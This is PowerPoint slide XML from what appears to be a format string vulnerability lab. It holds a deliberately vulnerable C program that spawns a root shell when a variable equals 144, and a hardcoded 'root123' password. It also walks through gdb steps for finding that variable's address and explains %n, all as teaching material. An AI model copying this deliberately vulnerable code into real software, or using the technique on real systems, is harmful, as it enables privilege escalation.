              <a:t> (buff) -1) == 0) { </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> ( "\ n Correct Password \ n"); </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>            pass = 144; </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>     } </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>     else { </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> ( "\ n Wrong Password \ n"); </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>     } </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>     if (pass == 144) { </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>     / * Now give root or admin rights to user * / </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> ( "\ n Root privileges given to the user \ n"); </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> (0); </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>          system ( "/ bin / bash"); </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>     } </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>      return 0; </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>} </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5933773" y="2091291"/>
            <a:ext cx="1853392" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> char * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>RootPW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> () { </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>      return "root123"; </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>} </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5883353" y="1777987"/>
            <a:ext cx="1989647" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The source of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RootPW.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="부제목 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A05FE0C-E396-4533-B6CD-258F77786A94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5933772" y="5407213"/>
            <a:ext cx="6258228" cy="1139752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="2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Check the vulnerable code of the source file, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0" err="1"/>
              <a:t>formatstring.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>From the original code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>snprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (buff, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (buff), "% s", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [1])</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>, the format string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"%s"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t> is omitted, so vulnerabilities exist. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>We also note that even though the correct password ‘root123’ is not typed, if the value of the variable pass is 144, root shell is given.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="133114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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="1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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23"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923407"/>
            <a:ext cx="5472608" cy="410882"/>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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[Attack]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>formatstring</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" kern="100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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12" name="부제목 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A05FE0C-E396-4533-B6CD-258F77786A94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="449079" y="5373216"/>
            <a:ext cx="5142866" cy="1139752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="1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Now, again, let’s run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0" err="1"/>
              <a:t>formatstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t> with argument A.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>Note that the address of the variable pass 0xbfffec00 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>(For each test, the address of the variable can be changed) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>Formatstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t> with argument  ABCD....</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>jj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>  has variable pass address 0xbfffebd0. </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="shape1402"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="389860" y="1448780"/>
            <a:ext cx="5634132" cy="1008112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="직사각형 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="856042" y="1628800"/>
            <a:ext cx="792088" cy="216024"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
              <a:alpha val="2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3935760" y="5589240"/>
            <a:ext cx="1008112" cy="281844"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
              <a:alpha val="2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shape1403"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6319121" y="2855217"/>
            <a:ext cx="5469207" cy="213446"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="shape1404"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6323923" y="3572719"/>
            <a:ext cx="5403215" cy="1247140"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6319121" y="3155063"/>
            <a:ext cx="3833878" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>) disassemble main</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="부제목 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A05FE0C-E396-4533-B6CD-258F77786A94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5711365" y="5373216"/>
            <a:ext cx="5354171" cy="1139752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="1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dirty="0"/>
              <a:t>Now, we debug </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>formatstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t> with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>, with ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>formatstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>’ command.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t> prompt, we type ‘disassemble main’.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>We can see that the address of ‘if(pass == 144)’ is 0x08048585. Here, 0x90 in Hexadecimal equals 144 in decimal.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="직사각형 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6240016" y="6199808"/>
            <a:ext cx="432048"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21" y="2724150"/>
            <a:ext cx="5612571" cy="1147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직사각형 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1193895" y="6212044"/>
            <a:ext cx="900100" cy="281844"/>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877362" y="3431797"/>
            <a:ext cx="758270" cy="213227"/>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889860" y="2840003"/>
            <a:ext cx="758270" cy="213227"/>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3423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20" grpId="0"/>
      <p:bldP spid="3"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a:xfrm>
            <a:off x="131060" y="44624"/>
            <a:ext cx="12060940" cy="5184576"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="000000">
              <a:alpha val="40000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" b="1" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>What is the use of the %n format specifier in C?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" b="1" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>Nothing printed. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>The argument must be a pointer to a signed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>, where the number of characters written so far is stored.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0"/>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
